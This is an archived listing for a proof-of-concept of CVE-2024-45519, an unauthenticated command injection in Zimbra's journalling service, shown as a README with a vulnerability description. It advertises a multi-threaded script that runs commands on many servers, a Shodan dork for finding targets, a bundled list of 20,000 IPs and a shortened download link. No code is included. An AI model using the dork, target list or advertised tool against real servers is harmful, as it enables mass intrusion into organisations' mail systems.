Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-45519 PoC — Zimbra Collaboration Server 安全漏洞

Source
Associated Vulnerability
Title:Zimbra Collaboration Server 安全漏洞 (CVE-2024-45519)
Description:Zimbra Collaboration Server(ZCS)是Zimbra公司的一套电子邮件和协作解决方案。该方案提供电子邮件、联系人、日历、文件共享、社交网络等功能。 Zimbra Collaboration Server存在安全漏洞,该漏洞源于日志服务有时允许未经身份验证的用户执行命令。以下版本受到影响:8.8.15补丁46之前版本、9.0.0补丁41之前版本、10.0.9之前版本和10.1.1之前版本。
Description
CVE-2024-45519 unauthenticated OS commoand Injection in Zimbra prior to 8.8.15***.
Readme
CVE-2024-45519 unauthenticated OS commoand Injection in Zimbra prior to 8.8.15***.


[Downlaod link here](https://bit.ly/3Bjuics)

# Details:
what is Journalling?<br>
Journalling is a process which is used for email compliance or archiving purposes.<br>
`Insecure handling of email data` results in unauthenticated command execution in context of `zimbra` user.<br>
The vulnerability occures in certain condition if journalling is configured `which is not a default configuration`,<br>
as its obvious with the journalling process mostl likely its configured by orginizations.<br>

# About:
Process:<br>
While the rules are set for journalling emails, The income emails are processed by MTA (in zimbra case its Postfix)<br>
when it detects that an email matches the journal rules, then it sends a copy of the email to the PostJournal service<br>
and then the PostJournal captures the email data including header,body.............

A complete deep dive (zimbra.pdf) to undrestand the vulnerable code and bypasses of filters and how we can abuse it to acheive Command Injection
</p>
A python script (CVE-2024-45519.py) which trigger the vulnerability and execute user supplied command in context of the zimbra user
can also execute command on single and multiple targets(IP list) with multi-threading capability.<br>

Shodan Dork: http.favicon.hash:1624375939 <br>
20k Ips are included here (ips.txt)<br>
in time of writting 66k results in shodan.<br>


# Download: [here](https://bit.ly/3Bjuics)
File Snapshot

[4.0K] /data/pocs/4642ad7a2af14b949e7b9f97592338f466641a81 └── [1.5K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.